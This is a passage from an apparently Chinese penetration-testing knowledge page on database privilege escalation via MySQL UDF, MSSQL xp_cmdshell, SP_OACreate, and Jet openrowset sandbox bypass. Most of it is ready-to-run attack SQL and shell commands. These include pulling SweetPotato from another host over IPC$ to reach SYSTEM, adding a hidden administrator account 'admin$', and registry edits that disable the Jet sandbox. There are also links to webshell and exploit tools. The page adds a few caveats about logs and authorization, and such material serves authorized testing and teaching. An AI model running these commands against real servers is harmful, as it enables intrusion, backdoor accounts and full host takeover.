</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><h3 id="udf提权">UDF提权 <a href="#udf提权" class="header-anchor">#</a></h3> <p>UDF(user-defined function)是MySQL的一个拓展接口，也可称之为<strong>用户自定义函数</strong></p> <p>用户可以通过自己增加函数对mysql功能进行扩充，文件后缀为.dll</p> <p><strong>利用条件：</strong></p> <blockquote><p><code>Server 2003、Windows XP、Windows 7</code></p> <p>已知mysql中root的账号密码</p> <p>mysql版本 &lt; 5.2 , UDF导出到系统目录c:/windows/system32/</p> <p>mysql版本 &gt; 5.2 ，UDF导出到安装路径MySQL\Lib\Plugin\</p> <p>secure_file_priv为空</p></blockquote> <p><strong>提权原理：</strong></p> <blockquote><p>利用root权限，创建带有调用cmd函数的‘udf.dll’(动态链接库)</p> <p>当我们把‘udf.dll’导出到指定文件夹并引入Mysql时，其中的调用函数被拿出来当作mysql的函数使用。</p> <p>这样我们自定义的函数才被当作本机函数执行。</p> <p>在使用CREATE FUNCTION调用dll中的函数后，mysql账号转化为system权限，从而提权</p></blockquote> <p>可以直接查询插件安装目录：</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>show variables like '%plugin%';
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>如果plugin不存在，可以用NTFS ADS流来创建文件夹并导入dll</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token comment">#先找到Mysql的目录select @@basedir;</span>
<span class="token comment">#利用ADS流来创建plugin文件夹（测试并不能成功创建）select 'It is dll' into dumpfile 'C:\\phpStudy\\PHPTutorial\\MySQL\\lib\\plugin::$INDEX_ALLOCATION';</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div><p>网上流传的是在数据库中直接就能利用ADS流创建plugin文件夹，但我测试发现直接导入文件可以，并不能创建文件夹。</p> <p>但是利用ADS流确实能创建文件夹，如以下命令（可以自己测试一下）</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token builtin class-name">echo</span> <span class="token number">123</span> <span class="token operator">&gt;</span> test::<span class="token variable">$INDEX_ALLOCATION</span>
<span class="token comment">#这条命令会创建一个test文件夹</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div><p>所以我是用<code>Webshell</code>这样创建的plugin文件夹：</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token builtin class-name">echo</span> <span class="token number">123</span> <span class="token operator">&gt;</span> C:<span class="token punctuation">\</span>phpStudy<span class="token punctuation">\</span>PHPTutorial<span class="token punctuation">\</span>MySQL<span class="token punctuation">\</span>lib<span class="token punctuation">\</span>plugin::<span class="token variable">$INDEX_ALLOCATION</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p><strong>有一个自动化工具</strong>：https://github.com/T3st0r-Git/HackMySQL</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token comment">#上边的创建plugin目录步骤完成后直接利用即可</span>
python root.py -a <span class="token number">192.168</span>.2.9 -proot -e <span class="token string">&quot;whoami&quot;</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div><p><strong>通过WebShell上传udf.php（这种方法数据库不用外连也可以）</strong></p> <p>udf.php：https://github.com/echohun/tools/blob/master/%E5%A4%A7%E9%A9%AC/udf.php</p> <h3 id="mssql数据库提权">MSSQL数据库提权 <a href="#mssql数据库提权" class="header-anchor">#</a></h3> <p><strong>首先查看权限</strong></p> <div class="language-sql line-numbers-mode"><pre class="language-sql"><code><span class="token comment">--是否sa权限，返回 1 就是sa</span>
<span class="token keyword">select</span> IS_SRVROLEMEMBER<span class="token punctuation">(</span><span class="token string">'sysadmin'</span><span class="token punctuation">)</span>

<span class="token comment">--是否dba权限，返回 1 就是DBA</span>
<span class="token keyword">select</span> IS_MEMBER<span class="token punctuation">(</span><span class="token string">'db_owner'</span><span class="token punctuation">)</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br></div></div><p><strong>一、xp_cmdshell</strong></p> <blockquote><p><strong>适用(xp\2000\2003系统)</strong></p> <p>前提是MSSQL是以system用户运行的，才能提权；</p> <p>如果用nt authority\network service运行，是没有系统权限的。</p></blockquote> <p>默认情况下是关闭的，用下边的命令开启</p> <div class="language-sql line-numbers-mode"><pre class="language-sql"><code><span class="token keyword">EXEC</span> sp_configure <span class="token string">'show advanced options'</span><span class="token punctuation">,</span> <span class="token number">1</span><span class="token punctuation">;</span> <span class="token comment">--允许修改高级参数</span>
<span class="token keyword">RECONFIGURE</span><span class="token punctuation">;</span>
<span class="token keyword">EXEC</span> sp_configure <span class="token string">'xp_cmdshell'</span><span class="token punctuation">,</span> <span class="token number">1</span><span class="token punctuation">;</span> <span class="token comment">--打开xp_cmdshell扩展</span>
<span class="token keyword">RECONFIGURE</span><span class="token punctuation">;</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br></div></div><p>如果 xp_cmdshell 被删除（sp_dropextendedproc），可以上传 <code>xplog70.dll</code> 后用 sp_addextendedproc 重新注册（同样需要 sysadmin；该过程自 SQL Server 2005 起已标记为弃用）。<code>xplog70.dll</code> 应取自与目标 SQL Server 版本、位数一致的安装目录（<code>...\MSSQL\Binn\xplog70.dll</code>），不要从第三方“DLL 下载站”获取——原文给出的 https://fix4dll.com/xplog70_dll 就属于此类来源，无法验证完整性，是典型的供应链风险，且版本不匹配会直接加载失败。恢复语句：</p> <div class="language-sql line-numbers-mode"><pre class="language-sql"><code><span class="token keyword">Exec</span> master<span class="token punctuation">.</span>dbo<span class="token punctuation">.</span>sp_addextendedproc <span class="token string">'xp_cmdshell'</span><span class="token punctuation">,</span><span class="token string">'c:\\xplog70.dll'</span><span class="token punctuation">;</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>然后执行命令</p> <div class="language-sql line-numbers-mode"><pre class="language-sql"><code><span class="token keyword">exec</span> xp_cmdshell <span class="token string">'whoami'</span><span class="token punctuation">;</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p><strong>sa 提权到 SYSTEM 并添加管理员（用于登 RDP）</strong></p> <p>xp_cmdshell 起的进程只有服务账户权限，所以这里先通过 IPC$ 从攻击机拷入 SweetPotato，再借服务账户通常持有的 SeImpersonatePrivilege 提升到 SYSTEM 去执行 net user。示例中的 IP 和口令均为实验环境取值；net use 出站连接、新建本地账户（4720）和加入 administrators 组（4732）都会留下事件日志，只在授权范围内使用。</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token builtin class-name">exec</span> xp_cmdshell <span class="token string">'net use <span class="token entity" title="\\">\\</span>192.168.10.133\ipc$ mcc5@133 /user:192.168.10.133<span class="token entity" title="\a">\a</span>dministrator&amp;&amp; copy <span class="token entity" title="\\">\\</span>192.168.10.133<span class="token entity" title="\c">\c</span>$\users\public<span class="token entity" title="\v">\v</span>ideos\sweetpotato.exe c:\users\public<span class="token entity" title="\v">\v</span>ideos\s.exe'</span>

<span class="token builtin class-name">exec</span> xp_cmdshell <span class="token string">'c:\users\public<span class="token entity" title="\v">\v</span>ideos\s.exe -a &quot;whoami&quot;'</span>

<span class="token builtin class-name">exec</span> xp_cmdshell <span class="token string">'c:\users\public<span class="token entity" title="\v">\v</span>ideos\s.exe -a &quot;net user admin$ @admin.886 /add&amp;net localgroup administrators admin$ /add&quot;'</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br></div></div><p><strong>二、SP_OACreate</strong></p> <blockquote><p><strong>适用范围：原文标注 xp/2000/2003，2005 及以后版本同样可用，只是 Ole Automation Procedures 默认关闭，需要 sysadmin 开启</strong></p></blockquote> <p>当 xp_cmdshell 被删除或禁用以后，还可以使用 SP_OACreate 调用 wscript.shell 执行命令。命令仍运行在 SQL Server 服务账户上下文中，和 xp_cmdshell 一样本身不是提权；sp_configure 的变更同样会写入错误日志。</p> <p><strong>首先要打开组件：</strong></p> <div class="language-sql line-numbers-mode"><pre class="language-sql"><code><span class="token comment">--开启 Ole Automation Procedures（需要 sysadmin）</span>
sp_configure <span class="token string">'show advanced options'</span><span class="token punctuation">,</span> <span class="token number">1</span><span class="token punctuation">;</span>
<span class="token keyword">RECONFIGURE</span><span class="token punctuation">;</span>
<span class="token keyword">EXEC</span> sp_configure <span class="token string">'Ole Automation Procedures'</span><span class="token punctuation">,</span> <span class="token number">1</span><span class="token punctuation">;</span>
<span class="token keyword">RECONFIGURE</span><span class="token punctuation">;</span>

<span class="token comment">--利用完后关闭 Ole Automation Procedures，恢复原状</span>
sp_configure <span class="token string">'show advanced options'</span><span class="token punctuation">,</span> <span class="token number">0</span><span class="token punctuation">;</span>
<span class="token keyword">RECONFIGURE</span><span class="token punctuation">;</span>
<span class="token keyword">EXEC</span> sp_configure <span class="token string">'Ole Automation Procedures'</span><span class="token punctuation">,</span> <span class="token number">0</span><span class="token punctuation">;</span>
<span class="token keyword">RECONFIGURE</span><span class="token punctuation">;</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br></div></div><p><strong>之后使用以下语句执行命令：</strong></p> <div class="language-sql line-numbers-mode"><pre class="language-sql"><code><span class="token keyword">declare</span> <span class="token variable">@shell</span> <span class="token keyword">int</span> <span class="token keyword">exec</span> sp_oacreate <span class="token string">'wscript.shell'</span><span class="token punctuation">,</span><span class="token variable">@shell</span> output <span class="token keyword">exec</span> sp_oamethod <span class="token variable">@shell</span><span class="token punctuation">,</span><span class="token string">'run'</span><span class="token punctuation">,</span><span class="token boolean">null</span><span class="token punctuation">,</span><span class="token string">'c:\windows\system32\cmd.exe /c whoami &gt;c:\\1.txt'</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p><strong>这种方式是无回显的，打开1.txt查看命令执行结果</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token builtin class-name">type</span> c:<span class="token punctuation">\</span><span class="token punctuation">\</span><span class="token number">1</span>.txt
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p><strong>三、openrowset沙盒</strong></p> <blockquote><p><strong>(2003系统可用、2012-r2实验失败)</strong></p> <p>失败原因：Microsoft.Jet.OLEDB.4.0 提供程序只有 32 位版本，64 位 SQL Server 实例加载不了，所以这条路径基本只对 32 位实例有效。此外 xp_regwrite 写 HKLM 与开启 Ad Hoc Distributed Queries 都需要 sysadmin，注册表改动可被 Sysmon（EventID 13）之类的监控捕获。</p></blockquote> <p><strong>首先检查 xp_cmdshell 扩展过程是否还在</strong>（此查询只说明对象是否注册，不代表已启用；是否启用看 <code>sys.configurations</code> 中 xp_cmdshell 的 value_in_use）</p> <div class="language-sql line-numbers-mode"><pre class="language-sql"><code><span class="token keyword">select</span> <span class="token function">count</span><span class="token punctuation">(</span><span class="token operator">*</span><span class="token punctuation">)</span> <span class="token keyword">from</span> master<span class="token punctuation">.</span>dbo<span class="token punctuation">.</span>sysobjects <span class="token keyword">where</span> xtype<span class="token operator">=</span><span class="token string">'x'</span> <span class="token operator">and</span> name<span class="token operator">=</span><span class="token string">'xp_cmdshell'</span>
<span class="token comment">--结果为 1 说明 xp_cmdshell 仍注册（未被 sp_dropextendedproc 删除），不等于已启用</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div><p><strong>第二步 用 xp_regwrite 关闭 Jet 沙盒（SandBoxMode=0，写 HKLM 需要 sysadmin），并开启默认关闭的 Ad Hoc Distributed Queries</strong></p> <div class="language-sql line-numbers-mode"><pre class="language-sql"><code><span class="token comment">--开启</span>
<span class="token keyword">EXEC</span> master<span class="token punctuation">.</span><span class="token punctuation">.</span>xp_regwrite <span class="token string">'HKEY_LOCAL_MACHINE'</span> <span class="token punctuation">,</span><span class="token string">'SOFTWARE\Microsoft\Jet\4.0\Engines'</span> <span class="token punctuation">,</span><span class="token string">'SandBoxMode'</span> <span class="token punctuation">,</span><span class="token string">'REG_DWORD'</span> <span class="token punctuation">,</span><span class="token number">0</span><span class="token punctuation">;</span>

<span class="token keyword">EXEC</span> sp_configure <span class="token string">'show advanced options'</span><span class="token punctuation">,</span> <span class="token number">1</span>
GO
<span class="token keyword">RECONFIGURE</span>
GO
<span class="token keyword">EXEC</span> sp_configure <span class="token string">'Ad Hoc Distributed Queries'</span><span class="token punctuation">,</span> <span class="token number">1</span>
GO
<span class="token keyword">RECONFIGURE</span>
GO

<span class="token comment">--利用完后恢复</span>
<span class="token keyword">EXEC</span> master<span class="token punctuation">.</span><span class="token punctuation">.</span>xp_regwrite <span class="token string">'HKEY_LOCAL_MACHINE'</span><span class="token punctuation">,</span><span class="token string">'SOFTWARE\Microsoft\Jet\4.0\Engines'</span><span class="token punctuation">,</span><span class="token string">'SandBoxMode'</span><span class="token punctuation">,</span><span class="token string">'REG_DWORD'</span><span class="token punctuation">,</span><span class="token number">1</span><span class="token punctuation">;</span>
<span class="token keyword">EXEC</span> sp_configure <span class="token string">'Ad Hoc Distributed Queries'</span><span class="token punctuation">,</span><span class="token number">0</span><span class="token punctuation">;</span><span class="token keyword">reconfigure</span><span class="token punctuation">;</span>
<span class="token keyword">EXEC</span> sp_configure <span class="token string">'show advanced options'</span><span class="token punctuation">,</span><span class="token number">0</span><span class="token punctuation">;</span><span class="token keyword">reconfigure</span><span class="token punctuation">;</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br><span class="line-number">13</span><br><span class="line-number">14</span><br><span class="line-number">15</span><br><span class="line-number">16</span><br></div></div><p><strong>利用jet.oledb执行系统命令</strong></p> <div class="language-sql line-numbers-mode"><pre class="language-sql"><code><span class="token keyword">select</span> <span class="token operator">*</span> <span class="token keyword">from</span> <span class="token keyword">openrowset</span><span class="token punctuation">(</span><span class="token string">'microsoft.jet.oledb.4.0'</span> <span class="token punctuation">,</span><span class="token string">';database=c:\windows\system32\ias\ias.mdb'</span> <span class="token punctuation">,</span><span class="token string">'select shell(&quot;cmd.exe /c whoami &gt; c:\\666.txt&quot;)'</span><span class="token punctuation">)</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>这个也是无回显的</p> <p><strong>沙盒模式 SandBoxMode 参数含义（原文称默认是 2；装了 Jet 4.0 SP8 及之后的系统默认通常为 3）</strong></p> <blockquote><p><code>0</code>：任何情况下都禁用沙盒（shell() 等不安全函数对所有调用方开放）</p> <p><code>1</code>：仅对 Access 程序启用沙盒，非 Access 程序（包括 SQL Server）不受限</p> <p><code>2</code>：仅对非 Access 程序启用沙盒，Access 程序不受限</p> <p><code>3</code>：任何情况下都启用沙盒</p> <p>因此上面的利用需要把值改成 0（或 1），2 和 3 都会拦下 shell()；利用完务必按前文改回原值。</p></blockquote> <p>OPENROWSET 可以通过任意 OLE DB 提供程序读取外部数据源，并不限于 SQL Server；这里借用的是 Jet 提供程序在查询表达式里执行 shell() 的能力。</p> <p>OLE DB 是 Windows 上通用的数据访问接口，各数据源由各自的提供程序（provider）实现。</p> <h3 id="oracle提权">Oracle提权 <a href="#oracle提权" class="header-anchor">#</a></h3> <p>利用<a href="https://github.com/jas502n/oracleShell" target="_blank" rel="noopener noreferrer">OracleShell.jar<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a>工具（第三方工具，使用前同样应审计或校验后再带入目标环境）</p></div> <footer class="page-edit"><!----> <div class="last-updated"><span class="prefix">上次更新:</span> <span class="time">12/18/2021, 12:46:42 PM</span></div></footer> <div class="page-nav"><p class="inner"><span class="prev"><a href="/knowledge/hw/intradomain-port.html" class="prev"><i aria-label="icon: left" class="anticon anticon-left"><svg viewBox="64 64 896 896" focusable="false" data-icon="left" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M724 218.3V141c0-6.7-7.7-10.4-12.9-6.3L260.3 486.8a31.86 31.86 0 0 0 0 50.3l450.8 352.1c5.3 4.1 12.9.4 12.9-6.3v-77.3c0-4.9-2.3-9.6-6.1-12.6l-360-281 360-281.1c3.8-3 6.1-7.7 6.1-12.6z"></path></svg></i>
  </body>
</html>